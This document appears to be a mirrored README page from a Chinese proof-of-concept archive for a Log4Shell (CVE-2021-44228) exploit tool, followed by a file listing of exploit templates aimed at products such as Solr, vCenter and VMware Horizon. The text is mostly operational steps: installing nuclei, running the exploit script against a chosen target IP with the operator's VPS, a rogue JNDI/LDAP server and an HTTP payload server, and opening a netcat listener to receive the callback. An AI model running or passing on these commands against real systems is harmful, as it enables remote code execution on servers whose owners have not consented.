关联漏洞
描述
exploit CVE-2021-44228
介绍
# CVE-2021-44228-POC<br>
exploit CVE-2021-44228 <br>
<br>
download nuclei
sudo cp nuclei /usr/bin/nuclei<br>
sudo chmod +x /usr/bin/nuclei<br>
git clone https://github.com/sec13b/CVE-2021-44228-POC.git<br>
mv CVE-2021-44228-POC log4shell_exploit<br>
<br>
mkdir yaml
<br>
mv *.yaml yaml/
<br><br>
<br>
run:<br>
python3 log4shell_exploit.py http://ip_to_exploit --nuclei_path /usr/bin/nuclei /home/ubuntu/log4shell_exploit/yaml/CVE-2021-44228.yaml -i Your_VPS_IP --ldap_jar_path /home/ubuntu/log4shell_exploit/jndi_server.jar --ldap_port 13012 --http_server_path /home/ubuntu/log4shell_exploit/http_server.py --http_port 13013 -o /home/ubuntu/log4shell_exploit/output.json --verbose<br>
<br>
<br>
nc -lvnp 13012
文件快照
[4.0K] /data/pocs/925cbcd0462e7eb01121f5193de154b87779ea23
├── [ 817] CVE-2021-44228-apache-druid-exploit.yaml
├── [ 801] CVE-2021-44228-apache-jspwiki-exploit.yaml
├── [ 895] CVE-2021-44228-cas-exploit.yaml
├── [ 574] CVE-2021-44228-code42-exploit.yaml
├── [ 759] CVE-2021-44228-elasticsearch-exploit.yaml
├── [3.2K] CVE-2021-44228-headers-exploit.yaml
├── [1.2K] CVE-2021-44228-headers-small-exploit.yaml
├── [ 491] CVE-2021-44228-jamf-exploit.yaml
├── [1.1K] CVE-2021-44228-mobileiron-exploit.yaml
├── [ 360] CVE-2021-44228-ofbiz-exploit.yaml
├── [ 922] CVE-2021-44228-openfire-exploit.yaml
├── [ 433] CVE-2021-44228-opennms-exploit.yaml
├── [ 785] CVE-2021-44228-path-exploit.yaml
├── [ 917] CVE-2021-44228-query-param-exploit.yaml
├── [ 607] CVE-2021-44228-solr-exploit.yaml
├── [ 877] CVE-2021-44228-struts2-showcase-exploit.yaml
├── [ 986] CVE-2021-44228-unifi-exploit.yaml
├── [1.1K] CVE-2021-44228-vcenter-exploit.yaml
├── [ 713] CVE-2021-44228-vmware-horizon-exploit.yaml
├── [ 842] CVE-2021-44228-vmware-site-recovery-exploit.yaml
├── [ 810] CVE-2021-44228-vrealize-exploit.yaml
├── [ 489] CVE-2021-44228-webmethods-exploit.yaml
├── [4.1K] http_server.py
├── [ 16M] jndi_server.jar
├── [8.7K] log4shell_exploit.py
├── [2.3K] proc_util.py
└── [ 718] README.md
0 directories, 27 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。